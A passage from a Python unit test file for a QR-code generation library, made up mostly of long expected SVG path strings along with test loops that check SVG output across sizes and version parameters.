4.8 4.0 L 4.8 3.2 z M 3.2 9.6 L 3.2 10.4 L 4.0 10.4 L 4.0 9.6 z M 10.4 13.6 L 10.4 14.4 L 11.2 14.4 L 11.2 13.6 z M 9.6 5.6 L 9.6 6.4 L 10.4 6.4 L 10.4 5.6 z M 6.4 8 L 6.4 8.8 L 7.2 8.8 L 7.2 8 z M 8 4 L 8 4.8 L 8.8 4.8 L 8.8 4 z M 6.4 16.8 L 6.4 17.6 L 7.2 17.6 L 7.2 16.8 z M 14.4 12.8 L 14.4 13.6 L 15.2 13.6 L 15.2 12.8 z M 7.2 19.2 L 7.2 20.0 L 8.0 20.0 L 8.0 19.2 z M 12.8 6.4 L 12.8 7.2 L 13.6 7.2 L 13.6 6.4 z M 8 19.2 L 8 20.0 L 8.8 20.0 L 8.8 19.2 z M 11.2 19.2 L 11.2 20.0 L 12.0 20.0 L 12.0 19.2 z M 12 19.2 L 12 20.0 L 12.8 20.0 L 12.8 19.2 z M 15.2 10.4 L 15.2 11.2 L 16.0 11.2 L 16.0 10.4 z M 14.4 5.6 L 14.4 6.4 L 15.2 6.4 L 15.2 5.6 z M 13.6 10.4 L 13.6 11.2 L 14.4 11.2 L 14.4 10.4 z M 16 19.2 L 16 20.0 L 16.8 20.0 L 16.8 19.2 z M 17.6 12 L 17.6 12.8 L 18.4 12.8 L 18.4 12 z M 3.2 4.8 L 3.2 5.6 L 4.0 5.6 L 4.0 4.8 z M 16.8 16.8 L 16.8 17.6 L 17.6 17.6 L 17.6 16.8 z M 9.6 13.6 L 9.6 14.4 L 10.4 14.4 L 10.4 13.6 z M 6.4 9.6 L 6.4 10.4 L 7.2 10.4 L 7.2 9.6 z M 5.6 3.2 L 5.6 4.0 L 6.4 4.0 L 6.4 3.2 z M 4.8 9.6 L 4.8 10.4 L 5.6 10.4 L 5.6 9.6 z M 10.4 9.6 L 10.4 10.4 L 11.2 10.4 L 11.2 9.6 z M 11.2 15.2 L 11.2 16.0 L 12.0 16.0 L 12.0 15.2 z M 8 4.8 L 8 5.6 L 8.8 5.6 L 8.8 4.8 z M 10.4 17.6 L 10.4 18.4 L 11.2 18.4 L 11.2 17.6 z M 14.4 10.4 L 14.4 11.2 L 15.2 11.2 L 15.2 10.4 z M 8 16.8 L 8 17.6 L 8.8 17.6 L 8.8 16.8 z M 12.8 10.4 L 12.8 11.2 L 13.6 11.2 L 13.6 10.4 z M 4 19.2 L 4 20.0 L 4.8 20.0 L 4.8 19.2 z M 16.8 15.2 L 16.8 16.0 L 17.6 16.0 L 17.6 15.2 z M 16 16.8 L 16 17.6 L 16.8 17.6 L 16.8 16.8 z M 13.6 12.8 L 13.6 13.6 L 14.4 13.6 L 14.4 12.8 z M 19.2 12.8 L 19.2 13.6 L 20.0 13.6 L 20.0 12.8 z M 12.8 19.2 L 12.8 20.0 L 13.6 20.0 L 13.6 19.2 z M 3.2 15.2 L 3.2 16.0 L 4.0 16.0 L 4.0 15.2 z M 5.6 11.2 L 5.6 12.0 L 6.4 12.0 L 6.4 11.2 z M 4 14.4 L 4 15.2 L 4.8 15.2 L 4.8 14.4 z M 10.4 12 L 10.4 12.8 L 11.2 12.8 L 11.2 12 z M 7.2 3.2 L 7.2 4.0 L 8.0 4.0 L 8.0 3.2 z M 5.6 16 L 5.6 16.8 L 6.4 16.8 L 6.4 16 z M 11.2 3.2 L 11.2 4.0 L 12.0 4.0 L 12.0 3.2 z M 9.6 16 L 9.6 16.8 L 10.4 16.8 L 10.4 16 z M 8 15.2 L 8 16.0 L 8.8 16.0 L 8.8 15.2 z M 16 12 L 16 12.8 L 16.8 12.8 L 16.8 12 z M 14.4 11.2 L 14.4 12.0 L 15.2 12.0 L 15.2 11.2 z M 8 17.6 L 8 18.4 L 8.8 18.4 L 8.8 17.6 z M 12.8 14.4 L 12.8 15.2 L 13.6 15.2 L 13.6 14.4 z M 18.4 8 L 18.4 8.8 L 19.2 8.8 L 19.2 8 z M 17.6 4.8 L 17.6 5.6 L 18.4 5.6 L 18.4 4.8 z M 16.8 11.2 L 16.8 12.0 L 17.6 12.0 L 17.6 11.2 z M 13.6 15.2 L 13.6 16.0 L 14.4 16.0 L 14.4 15.2 z M 19.2 4 L 19.2 4.8 L 20.0 4.8 L 20.0 4 z M 4.8 19.2 L 4.8 20.0 L 5.6 20.0 L 5.6 19.2 z M 5.6 10.4 L 5.6 11.2 L 6.4 11.2 L 6.4 10.4 z M 4.8 5.6 L 4.8 6.4 L 5.6 6.4 L 5.6 5.6 z M 9.6 8.8 L 9.6 9.6 L 10.4 9.6 L 10.4 8.8 z M 6.4 4.8 L 6.4 5.6 L 7.2 5.6 L 7.2 4.8 z M 4.8 14.4 L 4.8 15.2 L 5.6 15.2 L 5.6 14.4 z M 8 7.2 L 8 8.0 L 8.8 8.0 L 8.8 7.2 z M 12 8.8 L 12 9.6 L 12.8 9.6 L 12.8 8.8 z M 11.2 7.2 L 11.2 8.0 L 12.0 8.0 L 12.0 7.2 z M 8 9.6 L 8 10.4 L 8.8 10.4 L 8.8 9.6 z M 14.4 16 L 14.4 16.8 L 15.2 16.8 L 15.2 16 z M 18.4 16 L 18.4 16.8 L 19.2 16.8 L 19.2 16 z M 16.8 3.2 L 16.8 4.0 L 17.6 4.0 L 17.6 3.2 z M 16 9.6 L 16 10.4 L 16.8 10.4 L 16.8 9.6 z M 3.2 18.4 L 3.2 19.2 L 4.0 19.2 L 4.0 18.4 z M 12.8 18.4 L 12.8 19.2 L 13.6 19.2 L 13.6 18.4 z M 3.2 8 L 3.2 8.8 L 4.0 8.8 L 4.0 8 z M 15.2 8 L 15.2 8.8 L 16.0 8.8 L 16.0 8 z M 19.2 8 L 19.2 8.8 L 20.0 8.8 L 20.0 8 z M 17.6 17.6 L 17.6 18.4 L 18.4 18.4 L 18.4 17.6 z M 5.6 6.4 L 5.6 7.2 L 6.4 7.2 L 6.4 6.4 z M 4.8 6.4 L 4.8 7.2 L 5.6 7.2 L 5.6 6.4 z M 10.4 12.8 L 10.4 13.6 L 11.2 13.6 L 11.2 12.8 z M 9.6 6.4 L 9.6 7.2 L 10.4 7.2 L 10.4 6.4 z M 11.2 12 L 11.2 12.8 L 12.0 12.8 L 12.0 12 z M 8 8 L 8 8.8 L 8.8 8.8 L 8.8 8 z M 7.2 8 L 7.2 8.8 L 8.0 8.8 L 8.0 8 z M 6.4 17.6 L 6.4 18.4 L 7.2 18.4 L 7.2 17.6 z M 12 4.8 L 12 5.6 L 12.8 5.6 L 12.8 4.8 z M 11.2 8 L 11.2 8.8 L 12.0 8.8 L 12.0 8 z M 16 4.8 L 16 5.6 L 16.8 5.6 L 16.8 4.8 z M 12.8 7.2 L 12.8 8.0 L 13.6 8.0 L 13.6 7.2 z M 16.8 5.6 L 16.8 6.4 L 17.6 6.4 L 17.6 5.6 z M 15.2 9.6 L 15.2 10.4 L 16.0 10.4 L 16.0 9.6 z M 14.4 3.2 L 14.4 4.0 L 15.2 4.0 L 15.2 3.2 z M 3.2 16 L 3.2 16.8 L 4.0 16.8 L 4.0 16 z M 12.8 16 L 12.8 16.8 L 13.6 16.8 L 13.6 16 z M 18.4 3.2 L 18.4 4.0 L 19.2 4.0 L 19.2 3.2 z M 17.6 9.6 L 17.6 10.4 L 18.4 10.4 L 18.4 9.6 z M 3.2 5.6 L 3.2 6.4 L 4.0 6.4 L 4.0 5.6 z M 5.6 14.4 L 5.6 15.2 L 6.4 15.2 L 6.4 14.4 z M 6.4 10.4 L 6.4 11.2 L 7.2 11.2 L 7.2 10.4 z M 5.6 5.6 L 5.6 6.4 L 6.4 6.4 L 6.4 5.6 z M 4.8 10.4 L 4.8 11.2 L 5.6 11.2 L 5.6 10.4 z M 10.4 15.2 L 10.4 16.0 L 11.2 16.0 L 11.2 15.2 z M 7.2 12.8 L 7.2 13.6 L 8.0 13.6 L 8.0 12.8 z M 6.4 6.4 L 6.4 7.2 L 7.2 7.2 L 7.2 6.4 z M 5.6 19.2 L 5.6 20.0 L 6.4 20.0 L 6.4 19.2 z M 11.2 12.8 L 11.2 13.6 L 12.0 13.6 L 12.0 12.8 z M 9.6 19.2 L 9.6 20.0 L 10.4 20.0 L 10.4 19.2 z M 8 5.6 L 8 6.4 L 8.8 6.4 L 8.8 5.6 z M 10.4 16.8 L 10.4 17.6 L 11.2 17.6 L 11.2 16.8 z M 15.2 17.6 L 15.2 18.4 L 16.0 18.4 L 16.0 17.6 z M 14.4 14.4 L 14.4 15.2 L 15.2 15.2 L 15.2 14.4 z M 18.4 11.2 L 18.4 12.0 L 19.2 12.0 L 19.2 11.2 z M 15.2 15.2 L 15.2 16.0 L 16.0 16.0 L 16.0 15.2 z M 13.6 12 L 13.6 12.8 L 14.4 12.8 L 14.4 12 z M 4.8 16 L 4.8 16.8 L 5.6 16.8 L 5.6 16 z M 3.2 3.2 L 3.2 4.0 L 4.0 4.0 L 4.0 3.2 z M 16.8 18.4 L 16.8 19.2 L 17.6 19.2 L 17.6 18.4 z M 6.4 14.4 L 6.4 15.2 L 7.2 15.2 L 7.2 14.4 z M 11.2 4 L 11.2 4.8 L 12.0 4.8 L 12.0 4 z M 9.6 16.8 L 9.6 17.6 L 10.4 17.6 L 10.4 16.8 z M 8 12.8 L 8 13.6 L 8.8 13.6 L 8.8 12.8 z M 14.4 19.2 L 14.4 20.0 L 15.2 20.0 L 15.2 19.2 z M 6.4 19.2 L 6.4 20.0 L 7.2 20.0 L 7.2 19.2 z M 12 12.8 L 12 13.6 L 12.8 13.6 L 12.8 12.8 z M 18.4 19.2 L 18.4 20.0 L 19.2 20.0 L 19.2 19.2 z M 16.8 6.4 L 16.8 7.2 L 17.6 7.2 L 17.6 6.4 z M 8.8 10.4 L 8.8 11.2 L 9.6 11.2 L 9.6 10.4 z M 15.2 16.8 L 15.2 17.6 L 16.0 17.6 L 16.0 16.8 z M 8 18.4 L 8 19.2 L 8.8 19.2 L 8.8 18.4 z M 12.8 15.2 L 12.8 16.0 L 13.6 16.0 L 13.6 15.2 z M 17.6 5.6 L 17.6 6.4 L 18.4 6.4 L 18.4 5.6 z M 16.8 10.4 L 16.8 11.2 L 17.6 11.2 L 17.6 10.4 z M 19.2 4.8 L 19.2 5.6 L 20.0 5.6 L 20.0 4.8 z M 17.6 14.4 L 17.6 15.2 L 18.4 15.2 L 18.4 14.4 z M 5.6 9.6 L 5.6 10.4 L 6.4 10.4 L 6.4 9.6 z M 4.8 3.2 L 4.8 4.0 L 5.6 4.0 L 5.6 3.2 z M 6.4 5.6 L 6.4 6.4 L 7.2 6.4 L 7.2 5.6 z M 10.4 7.2 L 10.4 8.0 L 11.2 8.0 L 11.2 7.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
results = [rt] * 2 + [rs] * 2 + [rm] * 5 + [rl] * 2 + [rh] * 2 + [r6] * 2 + [r8] * 2
for i in range(len(sizes)):
size = sizes[i]
print('Testing SVG with size %s' % size)
result = results[i]
qr1 = make_embedded_qr_code(TEST_TEXT, QRCodeOptions(size=size))
qr2 = qr_from_text(TEST_TEXT, size=size)
qr3 = qr_from_text(TEST_TEXT, size=size, image_format='svg')
qr4 = qr_from_text(TEST_TEXT, options=QRCodeOptions(size=size, image_format='svg'))
qr5 = qr_from_text(TEST_TEXT, size=size, image_format='invalid-format-name')
self.assertEqual(qr1, qr2)
self.assertEqual(qr1, qr3)
self.assertEqual(qr1, qr4)
self.assertEqual(qr1, qr5)
self.assertEqual(qr1, result)
# print("\"\"\"%s\"\"\"," % qr1)
# print("\"\"\"{%% qr_from_text '%s' %%}\"\"\"," % qr1)
def test_version(self):
versions = [None, -1, 0, 41, '-1', '0', '41', 'blabla', 1, '1', 2, '2', 4, '4']
default_result = """<svg height="52.2mm" version="1.1" viewBox="0 0 52.2 52.2" width="52.2mm" xmlns="http://www.w3.org/2000/svg"><path d="M 36 18 L 36 19.8 L 37.8 19.8 L 37.8 18 z M 32.4 37.8 L 32.4 39.6 L 34.2 39.6 L 34.2 37.8 z M 28.8 9 L 28.8 10.8 L 30.6 10.8 L 30.6 9 z M 25.2 37.8 L 25.2 39.6 L 27.0 39.6 L 27.0 37.8 z M 7.2 43.2 L 7.2 45.0 L 9.0 45.0 L 9.0 43.2 z M 36 23.4 L 36 25.2 L 37.8 25.2 L 37.8 23.4 z M 32.4 14.4 L 32.4 16.2 L 34.2 16.2 L 34.2 14.4 z M 39.6 14.4 L 39.6 16.2 L 41.4 16.2 L 41.4 14.4 z M 30.6 37.8 L 30.6 39.6 L 32.4 39.6 L 32.4 37.8 z M 9 18 L 9 19.8 L 10.8 19.8 L 10.8 18 z M 7.2 25.2 L 7.2 27.0 L 9.0 27.0 L 9.0 25.2 z M 39.6 41.4 L 39.6 43.2 L 41.4 43.2 L 41.4 41.4 z M 21.6 16.2 L 21.6 18.0 L 23.4 18.0 L 23.4 16.2 z M 16.2 21.6 L 16.2 23.4 L 18.0 23.4 L 18.0 21.6 z M 14.4 7.2 L 14.4 9.0 L 16.2 9.0 L 16.2 7.2 z M 25.2 21.6 L 25.2 23.4 L 27.0 23.4 L 27.0 21.6 z M 23.4 7.2 L 23.4 9.0 L 25.2 9.0 L 25.2 7.2 z M 25.2 19.8 L 25.2 21.6 L 27.0 21.6 L 27.0 19.8 z M 36 12.6 L 36 14.4 L 37.8 14.4 L 37.8 12.6 z M 18 25.2 L 18 27.0 L 19.8 27.0 L 19.8 25.2 z M 28.8 18 L 28.8 19.8 L 30.6 19.8 L 30.6 18 z M 41.4 32.4 L 41.4 34.2 L 43.2 34.2 L 43.2 32.4 z M 37.8 10.8 L 37.8 12.6 L 39.6 12.6 L 39.6 10.8 z M 7.2 37.8 L 7.2 39.6 L 9.0 39.6 L 9.0 37.8 z M 32.4 9 L 32.4 10.8 L 34.2 10.8 L 34.2 9 z M 43.2 23.4 L 43.2 25.2 L 45.0 25.2 L 45.0 23.4 z M 39.6 23.4 L 39.6 25.2 L 41.4 25.2 L 41.4 23.4 z M 7.2 14.4 L 7.2 16.2 L 9.0 16.2 L 9.0 14.4 z M 43.2 14.4 L 43.2 16.2 L 45.0 16.2 L 45.0 14.4 z M 21.6 34.2 L 21.6 36.0 L 23.4 36.0 L 23.4 34.2 z M 14.4 25.2 L 14.4 27.0 L 16.2 27.0 L 16.2 25.2 z M 12.6 10.8 L 12.6 12.6 L 14.4 12.6 L 14.4 10.8 z M 10.8 18 L 10.8 19.8 L 12.6 19.8 L 12.6 18 z M 23.4 32.4 L 23.4 34.2 L 25.2 34.2 L 25.2 32.4 z M 21.6 10.8 L 21.6 12.6 L 23.4 12.6 L 23.4 10.8 z M 18 7.2 L 18 9.0 L 19.8 9.0 L 19.8 7.2 z M 14.4 36 L 14.4 37.8 L 16.2 37.8 L 16.2 36 z M 27 7.2 L 27 9.0 L 28.8 9.0 L 28.8 7.2 z M 23.4 36 L 23.4 37.8 L 25.2 37.8 L 25.2 36 z M 36 7.2 L 36 9.0 L 37.8 9.0 L 37.8 7.2 z M 37.8 30.6 L 37.8 32.4 L 39.6 32.4 L 39.6 30.6 z M 36 41.4 L 36 43.2 L 37.8 43.2 L 37.8 41.4 z M 32.4 10.8 L 32.4 12.6 L 34.2 12.6 L 34.2 10.8 z M 30.6 25.2 L 30.6 27.0 L 32.4 27.0 L 32.4 25.2 z M 10.8 37.8 L 10.8 39.6 L 12.6 39.6 L 12.6 37.8 z M 39.6 25.2 L 39.6 27.0 L 41.4 27.0 L 41.4 25.2 z M 7.2 9 L 7.2 10.8 L 9.0 10.8 L 9.0 9 z M 9 28.8 L 9 30.6 L 10.8 30.6 L 10.8 28.8 z M 21.6 28.8 L 21.6 30.6 L 23.4 30.6 L 23.4 28.8 z M 16.2 32.4 L 16.2 34.2 L 18.0 34.2 L 18.0 32.4 z M 12.6 39.6 L 12.6 41.4 L 14.4 41.4 L 14.4 39.6 z M 21.6 39.6 L 21.6 41.4 L 23.4 41.4 L 23.4 39.6 z M 27 34.2 L 27 36.0 L 28.8 36.0 L 28.8 34.2 z M 23.4 41.4 L 23.4 43.2 L 25.2 43.2 L 25.2 41.4 z M 34.2 36 L 34.2 37.8 L 36.0 37.8 L 36.0 36 z M 32.4 21.6 L 32.4 23.4 L 34.2 23.4 L 34.2 21.6 z M 18 36 L 18 37.8 L 19.8 37.8 L 19.8 36 z M 28.8 21.6 L 28.8 23.4 L 30.6 23.4 L 30.6 21.6 z M 43.2 36 L 43.2 37.8 L 45.0 37.8 L 45.0 36 z M 39.6 7.2 L 39.6 9.0 L 41.4 9.0 L 41.4 7.2 z M 37.8 21.6 L 37.8 23.4 L 39.6 23.4 L 39.6 21.6 z M 43.2 12.6 L 43.2 14.4 L 45.0 14.4 L 45.0 12.6 z M 10.8 39.6 L 10.8 41.4 L 12.6 41.4 L 12.6 39.6 z M 39.6 34.2 L 39.6 36.0 L 41.4 36.0 L 41.4 34.2 z M 7.2 32.4 L 7.2 34.2 L 9.0 34.2 L 9.0 32.4 z M 10.8 28.8 L 10.8 30.6 L 12.6 30.6 L 12.6 28.8 z M 12.6 37.8 L 12.6 39.6 L 14.4 39.6 L 14.4 37.8 z M 18 32.4 L 18 34.2 L 19.8 34.2 L 19.8 32.4 z M 27 25.2 L 27 27.0 L 28.8 27.0 L 28.8 25.2 z M 37.8 18 L 37.8 19.8 L 39.6 19.8 L 39.6 18 z M 32.4 16.2 L 32.4 18.0 L 34.2 18.0 L 34.2 16.2 z M 28.8 30.6 L 28.8 32.4 L 30.6 32.4 L 30.6 30.6 z M 37.8 27 L 37.8 28.8 L 39.6 28.8 L 39.6 27 z M 34.2 7.2 L 34.2 9.0 L 36.0 9.0 L 36.0 7.2 z M 43.2 7.2 L 43.2 9.0 L 45.0 9.0 L 45.0 7.2 z M 7.2 27 L 7.2 28.8 L 9.0 28.8 L 9.0 27 z M 12.6 18 L 12.6 19.8 L 14.4 19.8 L 14.4 18 z M 10.8 10.8 L 10.8 12.6 L 12.6 12.6 L 12.6 10.8 z M 9 25.2 L 9 27.0 L 10.8 27.0 L 10.8 25.2 z M 21.6 18 L 21.6 19.8 L 23.4 19.8 L 23.4 18 z M 23.4 19.8 L 23.4 21.6 L 25.2 21.6 L 25.2 19.8 z M 18 14.4 L 18 16.2 L 19.8 16.2 L 19.8 14.4 z M 27 14.4 L 27 16.2 L 28.8 16.2 L 28.8 14.4 z M 25.2 14.4 L 25.2 16.2 L 27.0 16.2 L 27.0 14.4 z M 23.4 43.2 L 23.4 45.0 L 25.2 45.0 L 25.2 43.2 z M 36 14.4 L 36 16.2 L 37.8 16.2 L 37.8 14.4 z M 28.8 19.8 L 28.8 21.6 L 30.6 21.6 L 30.6 19.8 z M 7.2 39.6 L 7.2 41.4 L 9.0 41.4 L 9.0 39.6 z M 32.4 18 L 32.4 19.8 L 34.2 19.8 L 34.2 18 z M 28.8 39.6 L 28.8 41.4 L 30.6 41.4 L 30.6 39.6 z M 39.6 18 L 39.6 19.8 L 41.4 19.8 L 41.4 18 z M 7.2 16.2 L 7.2 18.0 L 9.0 18.0 L 9.0 16.2 z M 30.6 41.4 L 30.6 43.2 L 32.4 43.2 L 32.4 41.4 z M 43.2 16.2 L 43.2 18.0 L 45.0 18.0 L 45.0 16.2 z M 9 7.2 L 9 9.0 L 10.8 9.0 L 10.8 7.2 z M 7.2 21.6 L 7.2 23.4 L 9.0 23.4 L 9.0 21.6 z M 23.4 30.6 L 23.4 32.4 L 25.2 32.4 L 25.2 30.6 z M 21.6 12.6 L 21.6 14.4 L 23.4 14.4 L 23.4 12.6 z M 14.4 18 L 14.4 19.8 L 16.2 19.8 L 16.2 18 z M 18 9 L 18 10.8 L 19.8 10.8 L 19.8 9 z M 14.4 37.8 L 14.4 39.6 L 16.2 39.6 L 16.2 37.8 z M 32.4 28.8 L 32.4 30.6 L 34.2 30.6 L 34.2 28.8 z M 16.2 43.2 L 16.2 45.0 L 18.0 45.0 L 18.0 43.2 z M 28.8 14.4 L 28.8 16.2 L 30.6 16.2 L 30.6 14.4 z M 18 43.2 L 18 45.0 L 19.8 45.0 L 19.8 43.2 z M 25.2 43.2 L 25.2 45.0 L 27.0 45.0 L 27.0 43.2 z M 27 43.2 L 27 45.0 L 28.8 45.0 L 28.8 43.2 z M 34.2 23.4 L 34.2 25.2 L 36.0 25.2 L 36.0 23.4 z M 32.4 12.6 L 32.4 14.4 L 34.2 14.4 L 34.2 12.6 z M 30.6 23.4 L 30.6 25.2 L 32.4 25.2 L 32.4 23.4 z M 36 43.2 L 36 45.0 L 37.8 45.0 L 37.8 43.2 z M 39.6 27 L 39.6 28.8 L 41.4 28.8 L 41.4 27 z M 7.2 10.8 L 7.2 12.6 L 9.0 12.6 L 9.0 10.8 z M 37.8 37.8 L 37.8 39.6 L 39.6 39.6 L 39.6 37.8 z M 21.6 30.6 L 21.6 32.4 L 23.4 32.4 L 23.4 30.6 z M 14.4 21.6 L 14.4 23.4 L 16.2 23.4 L 16.2 21.6 z M 12.6 7.2 L 12.6 9.0 L 14.4 9.0 L 14.4 7.2 z M 10.8 21.6 L 10.8 23.4 L 12.6 23.4 L 12.6 21.6 z M 23.4 21.6 L 23.4 23.4 L 25.2 23.4 L 25.2 21.6 z M 25.2 34.2 L 25.2 36.0 L 27.0 36.0 L 27.0 34.2 z M 18 10.8 L 18 12.6 L 19.8 12.6 L 19.8 10.8 z M 23.4 39.6 L 23.4 41.4 L 25.2 41.4 L 25.2 39.6 z M 32.4 23.4 L 32.4 25.2 L 34.2 25.2 L 34.2 23.4 z M 18 37.8 L 18 39.6 L 19.8 39.6 L 19.8 37.8 z M 28.8 23.4 L 28.8 25.2 L 30.6 25.2 L 30.6 23.4 z M 9 43.2 L 9 45.0 L 10.8 45.0 L 10.8 43.2 z M 37.8 34.2 L 37.8 36.0 L 39.6 36.0 L 39.6 34.2 z M 36 37.8 L 36 39.6 L 37.8 39.6 L 37.8 37.8 z M 30.6 28.8 L 30.6 30.6 L 32.4 30.6 L 32.4 28.8 z M 43.2 28.8 L 43.2 30.6 L 45.0 30.6 L 45.0 28.8 z M 28.8 43.2 L 28.8 45.0 L 30.6 45.0 L 30.6 43.2 z M 7.2 34.2 L 7.2 36.0 L 9.0 36.0 L 9.0 34.2 z M 12.6 25.2 L 12.6 27.0 L 14.4 27.0 L 14.4 25.2 z M 9 32.4 L 9 34.2 L 10.8 34.2 L 10.8 32.4 z M 23.4 27 L 23.4 28.8 L 25.2 28.8 L 25.2 27 z M 16.2 7.2 L 16.2 9.0 L 18.0 9.0 L 18.0 7.2 z M 12.6 36 L 12.6 37.8 L 14.4 37.8 L 14.4 36 z M 25.2 7.2 L 25.2 9.0 L 27.0 9.0 L 27.0 7.2 z M 21.6 36 L 21.6 37.8 L 23.4 37.8 L 23.4 36 z M 18 34.2 L 18 36.0 L 19.8 36.0 L 19.8 34.2 z M 36 27 L 36 28.8 L 37.8 28.8 L 37.8 27 z M 32.4 25.2 L 32.4 27.0 L 34.2 27.0 L 34.2 25.2 z M 18 39.6 L 18 41.4 L 19.8 41.4 L 19.8 39.6 z M 28.8 32.4 L 28.8 34.2 L 30.6 34.2 L 30.6 32.4 z M 41.4 18 L 41.4 19.8 L 43.2 19.8 L 43.2 18 z M 39.6 10.8 L 39.6 12.6 L 41.4 12.6 L 41.4 10.8 z M 37.8 25.2 L 37.8 27.0 L 39.6 27.0 L 39.6 25.2 z M 30.6 34.2 L 30.6 36.0 L 32.4 36.0 L 32.4 34.2 z M 43.2 9 L 43.2 10.8 L 45.0 10.8 L 45.0 9 z M 10.8 43.2 L 10.8 45.0 L 12.6 45.0 L 12.6 43.2 z M 12.6 23.4 L 12.6 25.2 L 14.4 25.2 L 14.4 23.4 z M 10.8 12.6 L 10.8 14.4 L 12.6 14.4 L 12.6 12.6 z M 21.6 19.8 L 21.6 21.6 L 23.4 21.6 L 23.4 19.8 z M 14.4 10.8 L 14.4 12.6 L 16.2 12.6 L 16.2 10.8 z M 10.8 32.4 L 10.8 34.2 L 12.6 34.2 L 12.6 32.4 z M 18 16.2 L 18 18.0 L 19.8 18.0 L 19.8 16.2 z M 27 19.8 L 27 21.6 L 28.8 21.6 L 28.8 19.8 z M 25.2 16.2 L 25.2 18.0 L 27.0 18.0 L 27.0 16.2 z M 18 21.6 L 18 23.4 L 19.8 23.4 L 19.8 21.6 z M 32.4 36 L 32.4 37.8 L 34.2 37.8 L 34.2 36 z M 41.4 36 L 41.4 37.8 L 43.2 37.8 L 43.2 36 z M 37.8 7.2 L 37.8 9.0 L 39.6 9.0 L 39.6 7.2 z M 36 21.6 L 36 23.4 L 37.8 23.4 L 37.8 21.6 z M 7.2 41.4 L 7.2 43.2 L 9.0 43.2 L 9.0 41.4 z M 28.8 41.4 L 28.8 43.2 L 30.6 43.2 L 30.6 41.4 z M 7.2 18 L 7.2 19.8 L 9.0 19.8 L 9.0 18 z M 34.2 18 L 34.2 19.8 L 36.0 19.8 L 36.0 18 z M 43.2 18 L 43.2 19.8 L 45.0 19.8 L 45.0 18 z M 39.6 39.6 L 39.6 41.4 L 41.4 41.4 L 41.4 39.6 z M 12.6 14.4 L 12.6 16.2 L 14.4 16.2 L 14.4 14.4 z M 10.8 14.4 L 10.8 16.2 L 12.6 16.2 L 12.6 14.4 z M 23.4 28.8 L 23.4 30.6 L 25.2 30.6 L 25.2 28.8 z M 21.6 14.4 L 21.6 16.2 L 23.4 16.2 L 23.4 14.4 z M 25.2 27 L 25.2 28.8 L 27.0 28.8 L 27.0 27 z M 18 18 L 18 19.8 L 19.8 19.8 L 19.8 18 z M 16.2 18 L 16.2 19.8 L 18.0 19.8 L 18.0 18 z M 14.4 39.6 L 14.4 41.4 L 16.2 41.4 L 16.2 39.6 z M 27 10.8 L 27 12.6 L 28.8 12.6 L 28.8 10.8 z M 25.2 18 L 25.2 19.8 L 27.0 19.8 L 27.0 18 z M 36 10.8 L 36 12.6 L 37.8 12.6 L 37.8 10.8 z M 28.8 16.2 L 28.8 18.0 L 30.6 18.0 L 30.6 16.2 z M 37.8 12.6 L 37.8 14.4 L 39.6 14.4 L 39.6 12.6 z M 34.2 21.6 L 34.2 23.4 L 36.0 23.4 L 36.0 21.6 z M 32.4 7.2 L 32.4 9.0 L 34.2 9.0 L 34.2 7.2 z M 7.2 36 L 7.2 37.8 L 9.0 37.8 L 9.0 36 z M 28.8 36 L 28.8 37.8 L 30.6 37.8 L 30.6 36 z M 41.4 7.2 L 41.4 9.0 L 43.2 9.0 L 43.2 7.2 z M 39.6 21.6 L 39.6 23.4 L 41.4 23.4 L 41.4 21.6 z M 7.2 12.6 L 7.2 14.4 L 9.0 14.4 L 9.0 12.6 z M 12.6 32.4 L 12.6 34.2 L 14.4 34.2 L 14.4 32.4 z M 14.4 23.4 L 14.4 25.2 L 16.2 25.2 L 16.2 23.4 z M 12.6 12.6 L 12.6 14.4 L 14.4 14.4 L 14.4 12.6 z M 10.8 23.4 L 10.8 25.2 L 12.6 25.2 L 12.6 23.4 z M 23.4 34.2 L 23.4 36.0 L 25.2 36.0 L 25.2 34.2 z M 16.2 28.8 L 16.2 30.6 L 18.0 30.6 L 18.0 28.8 z M 14.4 14.4 L 14.4 16.2 L 16.2 16.2 L 16.2 14.4 z M 12.6 43.2 L 12.6 45.0 L 14.4 45.0 L 14.4 43.2 z M 25.2 28.8 L 25.2 30.6 L 27.0 30.6 L 27.0 28.8 z M 21.6 43.2 L 21.6 45.0 L 23.4 45.0 L 23.4 43.2 z M 18 12.6 L 18 14.4 L 19.8 14.4 L 19.8 12.6 z M 23.4 37.8 L 23.4 39.6 L 25.2 39.6 L 25.2 37.8 z M 34.2 39.6 L 34.2 41.4 L 36.0 41.4 L 36.0 39.6 z M 32.4 32.4 L 32.4 34.2 L 34.2 34.2 L 34.2 32.4 z M 41.4 25.2 L 41.4 27.0 L 43.2 27.0 L 43.2 25.2 z M 34.2 34.2 L 34.2 36.0 L 36.0 36.0 L 36.0 34.2 z M 30.6 27 L 30.6 28.8 L 32.4 28.8 L 32.4 27 z M 10.8 36 L 10.8 37.8 L 12.6 37.8 L 12.6 36 z M 7.2 7.2 L 7.2 9.0 L 9.0 9.0 L 9.0 7.2 z M 37.8 41.4 L 37.8 43.2 L 39.6 43.2 L 39.6 41.4 z M 14.4 32.4 L 14.4 34.2 L 16.2 34.2 L 16.2 32.4 z M 25.2 9 L 25.2 10.8 L 27.0 10.8 L 27.0 9 z M 21.6 37.8 L 21.6 39.6 L 23.4 39.6 L 23.4 37.8 z M 18 28.8 L 18 30.6 L 19.8 30.6 L 19.8 28.8 z M 32.4 43.2 L 32.4 45.0 L 34.2 45.0 L 34.2 43.2 z M 14.4 43.2 L 14.4 45.0 L 16.2 45.0 L 16.2 43.2 z M 27 28.8 L 27 30.6 L 28.8 30.6 L 28.8 28.8 z M 41.4 43.2 L 41.4 45.0 L 43.2 45.0 L 43.2 43.2 z M 37.8 14.4 L 37.8 16.2 L 39.6 16.2 L 39.6 14.4 z M 19.8 23.4 L 19.8 25.2 L 21.6 25.2 L 21.6 23.4 z M 34.2 37.8 L 34.2 39.6 L 36.0 39.6 L 36.0 37.8 z M 18 41.4 L 18 43.2 L 19.8 43.2 L 19.8 41.4 z M 28.8 34.2 L 28.8 36.0 L 30.6 36.0 L 30.6 34.2 z M 39.6 12.6 L 39.6 14.4 L 41.4 14.4 L 41.4 12.6 z M 37.8 23.4 L 37.8 25.2 L 39.6 25.2 L 39.6 23.4 z M 43.2 10.8 L 43.2 12.6 L 45.0 12.6 L 45.0 10.8 z M 39.6 32.4 L 39.6 34.2 L 41.4 34.2 L 41.4 32.4 z M 12.6 21.6 L 12.6 23.4 L 14.4 23.4 L 14.4 21.6 z M 10.8 7.2 L 10.8 9.0 L 12.6 9.0 L 12.6 7.2 z 